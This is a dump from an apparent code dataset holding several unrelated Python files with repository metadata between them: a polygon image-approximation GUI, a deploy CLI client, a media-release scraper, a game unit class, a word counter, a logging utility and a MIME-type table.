              "New starting set of polygons?\nNote: you will lose all changes done so far."):
            self.best_fit.dna.init_dna()
            self.best_fit.mutations = 0
            self.best_fit.draw_dna()
            self.current_fit.dna.genes = copy.deepcopy(self.best_fit.dna.genes)
            self.current_fit.mutations = 0
            self.current_fit.draw_dna()
    def run(self):
        '''starts or resume/restarts the "fitting".'''
        self.running = True
        # Loops until pause()/reset() flips self.running (step() never
        # terminates on its own -- see its comment).
        while self.running:
            done = self.step()
        return done
    def step(self):
        '''single mutation step; currently never ends on its own'''
        # Mutation size shrinks as fitness improves: whole-value mutations
        # early, then progressively smaller nudges past each threshold.
        if self.best_fit.fitness < 82.:
            self.current_fit.dna.mutate()
        elif self.best_fit.fitness < 87.:
            self.current_fit.dna.small_mutate(64)
        elif self.best_fit.fitness < 91.:
            self.current_fit.dna.small_mutate(32)
        elif self.best_fit.fitness < 95.:
            self.current_fit.dna.small_mutate(16)
        else:
            self.current_fit.dna.small_mutate(8)
        self.current_fit.draw_dna()
        # Hill climbing: keep the mutation only if it improved the fitness,
        # otherwise roll the current genome back to the best one.
        if self.current_fit.fitness > self.best_fit.fitness:
            self.best_fit.dna.genes = copy.deepcopy(self.current_fit.dna.genes)
            self.best_fit.draw_dna()
        else:
            self.current_fit.dna.genes = copy.deepcopy(self.best_fit.dna.genes)
        return False # would return True to end the simulation
    def pause(self):
        '''self explanatory'''
        self.running = False
if __name__ == "__main__":
    # Entry point: build the Tk root, the main App (which creates the two
    # satellite windows), hook up the state engine, and start the event loop.
    main_app = tk.Tk()
    main_app.title('Image approximation with polygons')
    main_window = App(main_app)
    StateEngine(main_app, main_window.best_fit_window)
    main_app.mainloop()
|
UTF-8
|
Python
| false | false | 2,011 |
13,761,075,226,532 |
1f77531ac483d29f7f615ba0b46431d42638ca4c
|
ce1f9921ff2b07a653321fc48a72b5b29f34f40f
|
/nbe/actions.py
|
bc2a109572134fdce276bbdce9a49ffc6db25d03
|
[] |
no_license
|
tonicbupt/nbe-deploy
|
https://github.com/tonicbupt/nbe-deploy
|
01e354fddfac6ead05ea36093fced0ec4a7130ca
|
3c1940bf5536877410d38aeca072b116d1ad62df
|
refs/heads/master
| 2021-01-19T14:06:28.501404 | 2014-11-18T09:35:31 | 2014-11-18T09:35:31 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# coding: utf-8
import click
import json
import requests
import yaml
from urlparse import urljoin
from .utils import nbeerror, nbeinfo
from .config import config
def yaml_to_json(filename):
    """Load a YAML file and return its contents re-serialized as a JSON
    string; on a missing/unreadable file, report the error and return ''."""
    try:
        with open(filename, 'r') as source:
            parsed = yaml.load(source)
    except IOError:
        click.echo(nbeerror('file %s not exist.' % filename))
        return ''
    return json.dumps(parsed)
def yaml_load(filename):
    """Load and return a YAML file's contents as Python objects; on a
    missing/unreadable file, report the error and return {}."""
    try:
        with open(filename, 'r') as source:
            return yaml.load(source)
    except IOError:
        click.echo(nbeerror('file %s not exist.' % filename))
        return {}
def register_app(name, version, group):
    """POST the local app.yaml (as JSON) to the master, registering
    `name`/`version` under `group`.  Returns True on HTTP 200, or None when
    app.yaml is missing."""
    app_yaml = yaml_to_json('app.yaml')
    if not app_yaml:
        return
    data = {
        'appyaml': app_yaml,
        'group': group,
    }
    # NOTE(review): this is the only endpoint built with a leading slash
    # ('/app/...'); the sibling functions use 'app/...' -- confirm both
    # resolve to the same URL against the configured master base.
    url = urljoin(config.nbe_master_url,
        '/app/{name}/{version}'.format(name=name, version=version))
    r = requests.post(url, data=data)
    click.echo(nbeinfo('request sent to %s' % url))
    click.echo(nbeinfo(str(r.json())))
    return r.status_code == 200
def add_app(name, version, host, daemon):
    """POST an 'add' request for the local app.yaml's app at `version` on
    `host` (daemon flag forwarded).  Returns True on HTTP 200, or None when
    app.yaml is missing."""
    app_yaml = yaml_load('app.yaml')
    if not app_yaml:
        return
    data = {
        'host': host,
        'daemon': daemon,
    }
    # NOTE(review): the `name` parameter is ignored; the URL is built from
    # app.yaml's appname instead -- confirm which one should win.
    url = urljoin(config.nbe_master_url,
        'app/{name}/{version}/add'.format(name=app_yaml['appname'], version=version))
    r = requests.post(url, data)
    click.echo(nbeinfo('request sent to %s' % url))
    click.echo(nbeinfo(str(r.json())))
    return r.status_code == 200
def list_app(name, version='latest'):
    """GET and print info for `name` at `version` from the master.

    Unlike the sibling functions this parses r.content by hand, prints the
    fields, and returns nothing."""
    r = requests.get(urljoin(config.nbe_master_url,
        'app/{name}/{version}'.format(name=name, version=version)))
    if r.status_code == 200:
        rs = json.loads(r.content)
        # As used here, rs['r'] is the master's error flag: falsy == success.
        if not rs['r']:
            click.echo(nbeinfo(rs['name']))
            click.echo(nbeinfo(rs['version']))
        else:
            click.echo(nbeerror(rs['msg']))
    else:
        click.echo(nbeerror('Error: %s' % r.status_code))
def remove_app(name, version, host):
    """POST a 'remove' request for the local app.yaml's app at `version` on
    `host`.  Returns True on HTTP 200, or None when app.yaml is missing."""
    app_yaml = yaml_load('app.yaml')
    if not app_yaml:
        return
    data = {
        'host': host
    }
    # NOTE(review): `name` is ignored; the URL uses app.yaml's appname.
    url = urljoin(config.nbe_master_url,
        'app/{name}/{version}/remove'.format(name=app_yaml['appname'], version=version))
    r = requests.post(url, data)
    click.echo(nbeinfo('request sent to %s' % url))
    click.echo(nbeinfo(str(r.json())))
    return r.status_code == 200
def test_app(name, version, host):
    """POST a 'test' request for the local app.yaml's app at `version` on
    `host`.  Returns True on HTTP 200, or None when app.yaml is missing."""
    app_yaml = yaml_load('app.yaml')
    if not app_yaml:
        return
    data = {
        'host': host
    }
    # NOTE(review): `name` is ignored; the URL uses app.yaml's appname.
    url = urljoin(config.nbe_master_url,
        'app/{name}/{version}/test'.format(name=app_yaml['appname'], version=version))
    r = requests.post(url, data)
    click.echo(nbeinfo('request sent to %s' % url))
    click.echo(nbeinfo(str(r.json())))
    return r.status_code == 200
def build_image(name, version, group, base, host):
    """POST a 'build' request (image build on `host`, from `base`, under
    `group`) for the local app.yaml's app at `version`.  Returns True on
    HTTP 200, or None when app.yaml is missing."""
    app_yaml = yaml_load('app.yaml')
    if not app_yaml:
        return
    data = {
        'host': host,
        'group': group,
        'base': base,
    }
    # NOTE(review): `name` is ignored; the URL uses app.yaml's appname.
    url = urljoin(config.nbe_master_url,
        'app/{name}/{version}/build'.format(name=app_yaml['appname'], version=version))
    r = requests.post(url, data)
    click.echo(nbeinfo('request sent to %s' % url))
    click.echo(nbeinfo(str(r.json())))
    return r.status_code == 200
def deploy_app(name, version, host, daemon):
    """POST a 'deploy' request for the local app.yaml's app at `version`.
    Returns True on HTTP 200, or None when app.yaml is missing."""
    app_yaml = yaml_load('app.yaml')
    if not app_yaml:
        return
    data = {
        # NOTE(review): key is plural 'hosts' here vs. 'host' in
        # add/remove/test/build -- confirm the master expects this asymmetry.
        'hosts': host,
        'daemon': daemon,
    }
    # NOTE(review): `name` is ignored; the URL uses app.yaml's appname.
    url = urljoin(config.nbe_master_url,
        'app/{name}/{version}/deploy'.format(name=app_yaml['appname'], version=version))
    r = requests.post(url, data)
    click.echo(nbeinfo('request sent to %s' % url))
    click.echo(nbeinfo(str(r.json())))
    return r.status_code == 200
def update_app(name, old_version, new_version, host):
    """POST an 'update' request moving the local app.yaml's app from
    `old_version` to `new_version` on `host`.  Returns True on HTTP 200, or
    None when app.yaml is missing."""
    app_yaml = yaml_load('app.yaml')
    if not app_yaml:
        return
    data = {
        # NOTE(review): plural 'hosts' key, as in deploy_app; 'to' carries
        # the target version.
        'hosts': host,
        'to': new_version,
    }
    # NOTE(review): `name` is ignored; the URL uses app.yaml's appname.
    url = urljoin(config.nbe_master_url,
        'app/{name}/{old_version}/update'.format(name=app_yaml['appname'], old_version=old_version))
    r = requests.post(url, data)
    click.echo(nbeinfo('request sent to %s' % url))
    click.echo(nbeinfo(str(r.json())))
    return r.status_code == 200
|
UTF-8
|
Python
| false | false | 2,014 |
17,033,840,335,739 |
00eda397be2c29fb885e0a6ebf75aa8dc7956446
|
3d19e1a316de4d6d96471c64332fff7acfaf1308
|
/Users/P/peterneish/victorian_nationals_media_releases.py
|
c7db97f8ef9444751ec195359536b8e4a82e0772
|
[] |
no_license
|
BerilBBJ/scraperwiki-scraper-vault
|
https://github.com/BerilBBJ/scraperwiki-scraper-vault
|
4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc
|
65ea6a943cc348a9caf3782b900b36446f7e137d
|
refs/heads/master
| 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Parses victorian Nationals media releases
# NOTE(review): everything below appears TWICE, verbatim -- the duplicate run
# starts at the second "# Parses victorian Nationals media releases" comment
# and re-fetches/re-saves the same feed.  Presumably an export artifact of
# the scraper vault; confirm before relying on either copy.
import scraperwiki
from bs4 import BeautifulSoup
import feedparser
import re
import dateutil.parser
# DNN/DotNetNuke RSS endpoint; MaxCount caps the number of items returned.
url = "http://vic.nationals.org.au/DesktopModules/DnnForge%20-%20NewsArticles/Rss.aspx?TabID=131&ModuleID=450&MaxCount=100"
print url
feed = feedparser.parse(url)
entries = []
entries.extend(feed["items"])
for entry in entries:
    # Progress/debug output for each feed item.
    print entry["guid"]
    print entry["title"]
    print entry["link"]
    print entry["author"]
    print entry["updated"]
    print entry["description"]
    # now fetch the page and get the text
    page = scraperwiki.scrape(entry["link"])
    pagesoup = BeautifulSoup(page)
    page_content = pagesoup.find("div", { "class" : "article" })
    # Drop the class attribute so the stored HTML is style-agnostic.
    del(page_content["class"])
    published = dateutil.parser.parse(entry["updated"]);
    print page_content
    #new_page_text = unicode.join(u'\n',map(unicode,new_page_content))
    record = {"link" : entry["link"],
        "title" : entry["title"],
        "author" : entry["author"],
        "published" : published,
        "description" : entry["description"],
        "fulltext" : page_content}
    # Upsert keyed on the release URL.
    scraperwiki.sqlite.save(unique_keys=["link"], data=record)
# ---- verbatim duplicate of the scraper above ----
# Parses victorian Nationals media releases
import scraperwiki
from bs4 import BeautifulSoup
import feedparser
import re
import dateutil.parser
url = "http://vic.nationals.org.au/DesktopModules/DnnForge%20-%20NewsArticles/Rss.aspx?TabID=131&ModuleID=450&MaxCount=100"
print url
feed = feedparser.parse(url)
entries = []
entries.extend(feed["items"])
for entry in entries:
    print entry["guid"]
    print entry["title"]
    print entry["link"]
    print entry["author"]
    print entry["updated"]
    print entry["description"]
    # now fetch the page and get the text
    page = scraperwiki.scrape(entry["link"])
    pagesoup = BeautifulSoup(page)
    page_content = pagesoup.find("div", { "class" : "article" })
    del(page_content["class"])
    published = dateutil.parser.parse(entry["updated"]);
    print page_content
    #new_page_text = unicode.join(u'\n',map(unicode,new_page_content))
    record = {"link" : entry["link"],
        "title" : entry["title"],
        "author" : entry["author"],
        "published" : published,
        "description" : entry["description"],
        "fulltext" : page_content}
    scraperwiki.sqlite.save(unique_keys=["link"], data=record)
|
UTF-8
|
Python
| false | false | 2,013 |
18,150,531,799,087 |
6ee774bd1e7a2cfeca0525c9461c5aecceb0ff63
|
f439369c0dbbd3e9df037c63cc2d31a682e31dbe
|
/unit.py
|
85e97fe31f6a565f1652fb53841bba9bc6de5bd1
|
[] |
no_license
|
emahon/FireEmblemAI
|
https://github.com/emahon/FireEmblemAI
|
2ea9ebee4bf9a53cbe31abdbae7499279172c74d
|
8d54a1412fbaf1ea3472c29a263dc09fadf4119d
|
refs/heads/master
| 2021-01-02T09:08:57.514937 | 2013-05-10T03:20:42 | 2013-05-10T03:20:42 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#Represents a single unit
#Jazmin Gonzalez-Rivero, Zachary Homans, Elizabeth Mahon, Brendan Ritter
#Artificial Intelligence, Olin College, Spring 13
from feworld import *
import random
#A Unit is the basic moveable piece in Fire Emblem.
#They have a number of stats, an owner, and a name.
#They occupy a space. The death of a unit means defeat.
class unit:
#Units have the following:
# - Their World
# - Their Current Space
# - Their Major Stats
# - Their Class
# - Their Name
# - Their Owner
def __init__(self, world, space = None, hp = 20, attack = 10, defense = 0, move = 5, accuracy = .9, unitType = 'infantry', name = "", owner = None):
self.space = space
self.hp = hp
self.attack = attack
self.defense = defense
self.move = move
self.unitType = unitType
self.name = name
space.add_unit(self)
self.player = owner
self.accuracy = accuracy
def __str__(self):
return self.name
def __repr__(self):
return self.name
def get_space(self):
#Returns unit's space.
return self.space
def get_x(self):
#Returns x location.
return self.space.get_x()
def get_y(self):
#Returns y location.
return self.space.get_y()
def move_unit(self, space):
#Moves a unit to a new space, if possible.
self.move_list = self.get_move_list()
if space in self.move_list:
space.add_unit(self)
self.space = space
self.move_list = self.get_move_list()
print str(self.name) + " moved to " + str(space)
return 0
else:
print self.name+" can't move to "+ str(space)
return 1
def attack_enemy(self, enemy):
#Initiates an attack sequence.
#If the attack hits, do the appropriate damage. Else, nothing happens.
if random.random() < (self.accuracy-enemy.space.terrain.evasionMod):
damage = (self.attack - (enemy.defense + enemy.space.defense()))
enemy.hp = enemy.hp - damage
print self.name+" hit "+enemy.name+" for "+str(damage)+" damage."
else:
print self.name + " missed " + enemy.name
#Checks to see if the enemy is dead. If not, counterattack.
if enemy.hp > 0:
#After an attack comes a counterattack. It's the exact reverse of an attack.
if random.random() < (enemy.accuracy-self.space.terrain.evasionMod):
damage = (enemy.attack - (self.defense + self.space.defense()))
self.hp = self.hp - damage
print enemy.name+" hit "+self.name+" for "+str(damage)+" damage."
else:
print enemy.name + " missed " + self.name
if self.hp <= 0:
self.die()
else:
enemy.die()
def die(self):
#The unit dies.
self.space.unit = None
self.space = None
self.player.units.remove(self)
print self.name + " has died."
def get_move_list(self):
#Returns the list of possible movements of a unit.
#Does a basic breadth-first search.
#Considers movement modifers, terrain, and other units.
start_space = self.get_space()
world = start_space.world
moves_remaining = self.move
move_list = [start_space]
recent_moves = [(start_space,moves_remaining)]
next_moves = []
while recent_moves != []:
considered_space = recent_moves.pop(0)
for move_poss in ([0, 1], [0, -1], [1, 0], [-1, 0]):
place = world.get_space(considered_space[0].get_x()+move_poss[0], considered_space[0].get_y()+move_poss[1])
if place != None:
new_move = considered_space[1] - place.terrain.moveMod
#Units can "walk over" friendly units
#So don't make them a block
if place.unit in self.player.units or place.unit==None:
if place not in move_list:
if new_move >= 0:
move_list.append(place)
if new_move > 0:
recent_moves.append((place,new_move))
#Units cannot stand on the same spot as another unit
#So remove any spaces that have units on them.
for loc in move_list:
if loc.unit != None and loc.unit != self:
move_list.remove(loc)
return move_list
def get_attack_list(self):
#Expands one more space out from the movement list
#to determine the possible spaces a unit can attack.
world = self.space.world
move_list = self.get_move_list()
attack_list = []
for space in move_list:
in_range = []
for move_poss in ([0, 1], [0, -1], [1, 0], [-1, 0]):
in_range.append(world.get_space(space.get_x()+move_poss[0], space.get_y()+move_poss[1]))
for space_in_range in in_range:
if space_in_range != None and space_in_range not in attack_list:
attack_list.append(space_in_range)
return attack_list
|
UTF-8
|
Python
| false | false | 2,013 |
3,161,095,946,459 |
db3e902cea0ff801fc061452344173316232fa21
|
d6ed3b1a0d53fee2cfac45ee82735749819da28f
|
/ga/exercise/word_count.py
|
4c1da2c095357cc9abd154d3a22ff2df4e18006d
|
[] |
no_license
|
whitney/misc
|
https://github.com/whitney/misc
|
776ab87e3a95c566e91b04f0a3e284afa6ebd655
|
971bdd3886cb5d2146630ec35fda072f7d33afbc
|
refs/heads/master
| 2016-09-11T13:40:24.989515 | 2012-11-06T22:49:01 | 2012-11-06T22:49:01 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
import sys
import re
def main(search_word, text_file):
try:
f = open(text_file)
except IOError as e:
print "I/O error({0}): {1}".format(e.errno, e.strerror)
sys.exit(1)
count = 0
distances = []
curr_dist = 0
found = False
line_rgx = re.compile('\W+')
word_rgx = re.compile(search_word, flags=re.IGNORECASE)
for line in f:
words = line_rgx.split(line)
for word in words:
if not word: continue
if word_rgx.match(word):
if found:
distances.append(curr_dist)
else:
found = True
count += 1
curr_dist = 0
else:
curr_dist += 1
avg_dist = float(sum(distances))/len(distances) if len(distances) > 0 else float('nan')
print "Token occurences: {0}".format(count)
print "Avg distance: {0}".format(avg_dist)
if __name__ == "__main__":
    # CLI entry point: word_count.py <word> <path_to_file>
    if len(sys.argv) != 3:
        usg = "usage: word_count.py <word> <path_to_file>\n"
        usg += "ex. ./word_count.py peace WarAndPeace.txt"
        print usg
        sys.exit(1)
    word = sys.argv[1]
    text_file = sys.argv[2]
    main(word, text_file)
|
UTF-8
|
Python
| false | false | 2,012 |
2,430,951,502,863 |
b31ff788e632971514cc22198d52b9c145a5012a
|
9b85c93e9ee2ac36657b83fc3c4ec4b70a3dbb1c
|
/cpsm/operational_limits/operational_limit_set.py
|
27ff2d106026671d7e06de594b7567d929abefb7
|
[
"AGPL-3.0-only",
"AGPL-3.0-or-later"
] |
non_permissive
|
ResearchEngr/openpowersystem
|
https://github.com/ResearchEngr/openpowersystem
|
54643b4e076615761735b431e688cb3da662d9c0
|
f2367104277d6d1b05cf127231abdab925481876
|
refs/heads/master
| 2021-01-14T09:54:27.623200 | 2010-06-22T14:20:44 | 2010-06-22T14:20:44 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#------------------------------------------------------------------------------
# Copyright (C) 2009 Richard Lincoln
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation; version 2 dated June, 1991.
#
# This software is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANDABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#------------------------------------------------------------------------------
""" A set of limits associated with equipmnet.
"""
# <<< imports
# @generated
from cpsm.core.identified_object import IdentifiedObject
from cpsm.core.equipment import Equipment
from google.appengine.ext import db
# >>> imports
class OperationalLimitSet(IdentifiedObject):
    """ A set of limits associated with equipment.
    """
    # NOTE(review): this module is code-generated (see the @generated
    # markers); regeneration will overwrite manual edits.
    # <<< operational_limit_set.attributes
    # @generated
    # >>> operational_limit_set.attributes
    # <<< operational_limit_set.references
    # @generated
    # The equipment to which the limit set applies (GAE datastore reference;
    # reverse query available as Equipment.operational_limit_set).
    equipment = db.ReferenceProperty(Equipment,
        collection_name="operational_limit_set")
    # Virtual property. Values of equipment limits.
    pass # operational_limit_value
    # >>> operational_limit_set.references
    # <<< operational_limit_set.operations
    # @generated
    # >>> operational_limit_set.operations
|
UTF-8
|
Python
| false | false | 2,010 |
438,086,706,651 |
6939c0afbef5e2a06b6de8dc01e010099cf18969
|
98a3167fb54d3eab8974ad9dd04929fd45b435c3
|
/pyutils/log.py
|
ca0c95e1766deb74451077d33ee2a4a1392d433c
|
[] |
no_license
|
gmerritt/python_networktools
|
https://github.com/gmerritt/python_networktools
|
eb5da07eddff1fd89fdc37cc95190490b92c6d37
|
3a747426e03f6b62eb619a1fa57a3b30254f7202
|
refs/heads/master
| 2021-01-15T17:59:18.747387 | 2014-08-14T22:03:42 | 2014-08-14T22:03:42 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
######################################################################################
# Python's logging libraries are overly complicated for daily use.
#
# This library simplifies things by assuming that your application:
#
# * Wants to write all log messages to a single log file or to stdout.
# * Only wants to toggle between INFO and DEBUG level logging.
#
# Sample usage:
#
# import pyUtils.log
# import signal
# pyUtils.log.setup_logging( "/var/log/myapp.log" )
# # reopen logfile if we catch a sighup (e.g. from logrotate)
# signal.signal( signal.SIGHUP, pyUtils.log.reopen_logfile )
# logging.info( "myapp started" )
#
######################################################################################
import logging
import time
import sys
import os
__log_setup_complete = False
__logfile_handler = None
__logfile_name = None
__log_format = "%(asctime)s %(levelname)-5s [%(process)d/%(threadName)-10s]: %(message)s"
__sigusr_handler = None
class log_prepend(logging.Filter):
    """
    Log filter that prepends contextual information to every record's
    message (original use case: MAC addresses, to make grepping easier).

    The prepend value is changed in-band: a record logged at ``loglevel``
    (default 99) sets the value to the last ``length`` characters of that
    record's message, and a message of ``None`` at that level resets it to
    ``default``.  Such control records are swallowed (filter returns False).

    To change value use:   logging.log(99, 'value')
    To reset value use:    logging.log(99, None)
    """
    def __init__(self, default='00-00-00', length=8, loglevel=99):
        self.default_value = default
        self.log_level = loglevel
        # Stored negated so msg[self.length:] slices the last `length` chars.
        self.length = -length
        self.log_prepend_value = default

    def filter(self, record):
        # Control record: update/reset the prepend value and drop the record.
        if record.levelno == self.log_level:
            if record.msg is None:
                self.log_prepend_value = self.default_value
            else:
                self.log_prepend_value = record.msg[self.length:]
            return False
        try:
            new_msg = self.log_prepend_value + " | " + record.msg.__str__()
        except Exception:
            # BUGFIX: was a bare `except:` (also caught KeyboardInterrupt /
            # SystemExit); fall back to repr() for objects whose __str__
            # misbehaves.
            new_msg = self.log_prepend_value + " | " + record.msg.__repr__()
        # Prefix continuation lines of multi-line messages as well.
        new_msg = new_msg.replace("\n", "\n" + self.log_prepend_value + " | ")
        record.msg = new_msg
        return True
class sigusr_log_handler(logging.Handler):
    """Handler that watches the clock on every record it sees and, once
    `sigusr_timeout` has passed, turns temporary DEBUG logging back off
    (restores INFO on the root logger and detaches itself).

    NOTE(review): handle() is overridden to do only this bookkeeping --
    records routed to this handler are never emitted; confirm intended."""
    def __init__(self, level=logging.NOTSET):
        # 0 means "no deadline armed"; otherwise an absolute time.time() value.
        self.sigusr_timeout = 0
        logging.Handler.__init__(self, level)

    def handle(self, record):
        '''This function is called every time a log record is encountered'''
        armed = self.sigusr_timeout != 0
        if not (armed and self.sigusr_timeout <= time.time()):
            return
        # Deadline reached: disarm, drop back to INFO, and detach ourselves.
        self.sigusr_timeout = 0
        logging.debug( "Stopping DEBUG Logging - SIGUSR1 Expired" )
        root_logger = logging.getLogger('')
        root_logger.setLevel(logging.INFO)
        root_logger.removeHandler(self)
def setup_logging( logfile=None, verbose=False, debug=False, enable_sigusr=False, prepend_mac=False ):
    '''Initialize the python logging classes with some reasonable defaults.

    logfile:       file where log messages will be written; when None,
                   logging.basicConfig() is used instead
    verbose:       if true, log messages are also echoed to stdout
                   (only meaningful together with logfile)
    debug:         if true, log at priority DEBUG (default is INFO)
    enable_sigusr: if true, install a SIGUSR1 handler that temporarily
                   raises the log level to DEBUG
    prepend_mac:   if true, install the log_prepend filter on the root logger

    After calling this function your application can write log messages via
    logging.<loglevel>( "foo" ), assuming you've done "import logging"
    somewhere along the way.
    '''
    global __logfile_handler, __logfile_name, __log_setup_complete

    loglevel = logging.DEBUG if debug else logging.INFO
    root = logging.getLogger('')
    root.setLevel(loglevel)

    if logfile:
        __logfile_name = logfile
        handler = logging.FileHandler(logfile)
        handler.setFormatter(logging.Formatter(__log_format))
        root.addHandler(handler)
        __logfile_handler = handler
        if verbose:
            # also log to stdout
            console = logging.StreamHandler(sys.stdout)
            console.setFormatter(logging.Formatter(__log_format))
            root.addHandler(console)
        if prepend_mac:
            root.addFilter(log_prepend(default='00-00-00', length=8, loglevel=99))
    else:
        # no logfile: fall back to a plain basicConfig() setup
        logging.basicConfig(level=loglevel, format=__log_format)

    if enable_sigusr:
        import signal
        signal.signal(signal.SIGUSR1, __SIGUSR_Handler)

    __log_setup_complete = True
    logging.debug("debug logging enabled")
def reopen_logfile(signum=None, frame=None):
    '''Close and reopen the logfile; call me after rotating logs.

    The signature is signal-handler compatible so the function can be
    registered directly for e.g. SIGHUP after log rotation; both
    arguments are ignored.
    '''
    global __logfile_handler, __logfile_name
    if not logging_is_setup():
        abort("must call setup_logging() before reopen_logfile()")
    root = logging.getLogger('')
    root.removeHandler(__logfile_handler)
    # open a fresh handler against the (possibly rotated) path
    fresh = logging.FileHandler(__logfile_name)
    fresh.setFormatter(logging.Formatter(__log_format))
    root.addHandler(fresh)
    __logfile_handler = fresh
    logging.info("started new logfile")
def logging_is_setup():
    '''Returns True if setup_logging() has been called; false otherwise.'''
    # module-level flag, flipped to True at the end of setup_logging()
    return __log_setup_complete
def __SIGUSR_Handler(signum, frame):
    '''Signal handler: temporarily enable DEBUG logging for 30 minutes.

    Installed by setup_logging(enable_sigusr=True).  Raises the root
    logger to DEBUG and arms a sigusr_log_handler that restores INFO
    once the window expires.
    '''
    import signal
    if signum != signal.SIGUSR1:
        return
    global __sigusr_handler
    # lazily create the watchdog handler on first use
    if __sigusr_handler is None:
        __sigusr_handler = sigusr_log_handler()
    # (re)arm the expiry deadline: 30 minutes from now
    __sigusr_handler.sigusr_timeout = time.time() + 30 * 60
    root = logging.getLogger('')
    root.setLevel(logging.DEBUG)
    root.addHandler(__sigusr_handler)
    logging.debug( "SIGUSR1 Encountered - Begin DEBUG Logging" )
def abort( message ):
    '''Log a fatal() message and exit the current process.
    If you have cleanup to do, do it before calling me! Calling this
    function also won't clean up pidfiles or anything else, under the
    assumption that we'd like someone to be able to manually clean up
    or inspect the state of the app later on.'''
    logging.fatal( message )
    # os._exit deliberately skips atexit handlers and buffered-IO flushing
    os._exit(1)
|
UTF-8
|
Python
| false | false | 2,014 |
4,372,276,719,487 |
33fb31b4fb6e327f56a9f8550d968df1a3f54ab6
|
679be2df830e0795f012bbe1f8d6f8de3e371c24
|
/broadway/mpx/service/network/http/mime_types.py
|
05359fa69cd69de704f8744c3102623fd8960251
|
[] |
no_license
|
ed-aicradle/monotone
|
https://github.com/ed-aicradle/monotone
|
c98add2ce0468d583084953ee3f57bc9cbd4de73
|
57a23f85b8c18dfcea3e7d4cb194061ff86d2072
|
refs/heads/master
| 2021-05-27T08:18:28.655822 | 2013-01-30T00:31:10 | 2013-01-30T00:31:10 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"""
Copyright (C) 2003 2007 2010 2011 Cisco Systems
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to:
The Free Software Foundation, Inc.
59 Temple Place - Suite 330
Boston, MA 02111-1307, USA.
As a special exception, if other files instantiate classes, templates
or use macros or inline functions from this project, or you compile
this file and link it with other works to produce a work based
on this file, this file does not by itself cause the resulting
work to be covered by the GNU General Public License. However
the source code for this file must still be made available in
accordance with section (3) of the GNU General Public License.
This exception does not invalidate any other reasons why a work
based on this file might be covered by the GNU General Public
License.
"""
# Mapping from lower-case filename extension (without the leading dot) to
# the MIME content-type that should be served for that extension.
table = {
    'a': 'application/octet-stream',
    'ai': 'application/postscript',
    'aif': 'audio/x-aiff',
    'aifc': 'audio/x-aiff',
    'aiff': 'audio/x-aiff',
    'au': 'audio/basic',
    'avi': 'video/x-msvideo',
    'bat': 'text/plain',
    'bcpio': 'application/x-bcpio',
    'bin': 'application/octet-stream',
    'bmp': 'image/x-ms-bmp',
    'c': 'text/plain',
    'cdf': 'application/x-netcdf',
    'class': 'application/octet-stream',
    'cpio': 'application/x-cpio',
    'cpt': 'application/mac-compactpro',
    'csh': 'application/x-csh',
    'css': 'text/css',
    'dcr': 'application/x-director',
    'dir': 'application/x-director',
    'dll': 'application/octet-stream',
    'dms': 'application/octet-stream',
    'doc': 'application/msword',
    'dot': 'application/msword',
    'dvi': 'application/x-dvi',
    'dxr': 'application/x-director',
    'eml': 'message/rfc822',
    'eps': 'application/postscript',
    'etx': 'text/x-setext',
    'exe': 'application/octet-stream',
    'gif': 'image/gif',
    'gtar': 'application/x-gtar',
    'gz': 'application/x-gzip',
    'h': 'text/plain',
    'hdf': 'application/x-hdf',
    'hqx': 'application/mac-binhex40',
    'htm': 'text/html',
    'html': 'text/html',
    'ice': 'x-conference/x-cooltalk',
    'ief': 'image/ief',
    'jar': 'application/octet-stream',
    'jpe': 'image/jpeg',
    'jpeg': 'image/jpeg',
    'jpg': 'image/jpeg',
    'js': 'application/x-javascript',
    'json': 'application/json',
    'kar': 'audio/midi',
    'ksh': 'text/plain',
    'latex': 'application/x-latex',
    'lha': 'application/octet-stream',
    'lzh': 'application/octet-stream',
    'm1v': 'video/mpeg',
    'man': 'application/x-troff-man',
    'me': 'application/x-troff-me',
    'mht': 'message/rfc822',
    'mhtml': 'message/rfc822',
    'mid': 'audio/midi',
    'midi': 'audio/midi',
    'mif': 'application/x-mif',
    'mov': 'video/quicktime',
    'movie': 'video/x-sgi-movie',
    'mp2': 'audio/mpeg',
    'mp3': 'audio/mpeg',
    'mpa': 'video/mpeg',
    'mpe': 'video/mpeg',
    'mpeg': 'video/mpeg',
    'mpg': 'video/mpeg',
    'mpga': 'audio/mpeg',
    'ms': 'application/x-troff-ms',
    'nc': 'application/x-netcdf',
    'nws': 'message/rfc822',
    'o': 'application/octet-stream',
    'obj': 'application/octet-stream',
    'oda': 'application/oda',
    'p12': 'application/x-pkcs12',
    'p7c': 'application/pkcs7-mime',
    'pbm': 'image/x-portable-bitmap',
    'pdb': 'chemical/x-pdb',
    'pdf': 'application/pdf',
    'pfx': 'application/x-pkcs12',
    'pgm': 'image/x-portable-graymap',
    'pl': 'text/plain',
    'png': 'image/png',
    'pnm': 'image/x-portable-anymap',
    'pot': 'application/vnd.ms-powerpoint',
    'ppa': 'application/vnd.ms-powerpoint',
    'ppm': 'image/x-portable-pixmap',
    'pps': 'application/vnd.ms-powerpoint',
    'ppt': 'application/vnd.ms-powerpoint',
    'ps': 'application/postscript',
    'pwz': 'application/vnd.ms-powerpoint',
